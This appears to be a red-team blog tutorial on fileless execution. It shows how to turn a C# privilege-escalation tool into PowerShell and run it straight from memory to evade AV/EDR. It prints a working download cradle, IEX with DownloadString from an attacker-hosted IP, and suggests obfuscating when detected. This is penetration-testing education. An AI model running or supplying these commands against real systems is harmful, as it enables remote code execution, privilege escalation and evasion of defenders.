In this technique we will be going over how to have our payloads downloaded via HTTP and then being loaded directly into memory. This would be a technique to evade some current AV/EDR vendors.
How this will be done is first, we will use PowerShellArmoury which has the script ConvertTo-Powershell.ps1 to convert any of our C# executables into Powershell scripts (for this example we will just be using a premade script from PowerSharpPack named BadPotato which has already gone through this process)
and next through Powershell download cradles, which just simply put is a single line command for download and execution of our code, we will be able to get the script into memory without ever touching disk! (ALL LINKS ARE BELOW)
-------------------------------------------------------------------------------------------------------------------
Once we have our tools downloaded we can go into the PowerSharpBinaries directory and see all of the C# executables that have already been converted into Powershell for us
As mentioned before we'll be using BadPotato which is a C# executable for Windows 8-10 & Windows Server 2012-2019 privilege escalation.
With the commands
cat -raw .\Invoke-BadPotato.ps1
&
Invoke-BadPotato
we can see and verify that this script is working as a converted binary.
-------------------------------------------------------------------------------------------------------------------
Now how can we go about getting this powershell script loaded from an HTTP hosted source and inject it straight into memory so we never have a file touch disk? The answer is the tool Invoke-CradleCrafter v1.1
Using the commands
import-module .\Invoke-CradleCrafter.ps1
&
Invoke-CradleCrafter
the tool loads up we'll be given with the choice to load the Powershell script into memory or disk. By choosing memory we will see a list of available cradles to download our payload
Choosing MEMORY\NETWEBSTRING\Invoke 2 we are given the result:
IEX ([System.Net.WebClient]::New().DownloadString('http://192.168.1.19:80/Invoke-BadPotato.ps1'))
--> I edited the URL to match my Kali machine hosting the file. Once this command is run we can run another IN A NEW POWERSHELL INSTANCE:
Invoke-BadPotato
and we will see that our Powershell script was indeed downloaded and ran in memory successfully again!
Remember, this can be done with any pre-existing powershell scripts or ANY other C# binary you can think of Rubeus, Seatbelt, maybe even a DLL sideloader?
Thanks!π
(Just as a note, you made need to obfuscate the C# source code and/or the Powershell script if the AV/EDR your testing is detecting this. There are tons of resources out there on how to do this and may be featured in a future blog post!)
:LINKS:
https://www.youtube.com/watch?v=BO0bVFZJmpg (Cyber Attack & Defense)
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
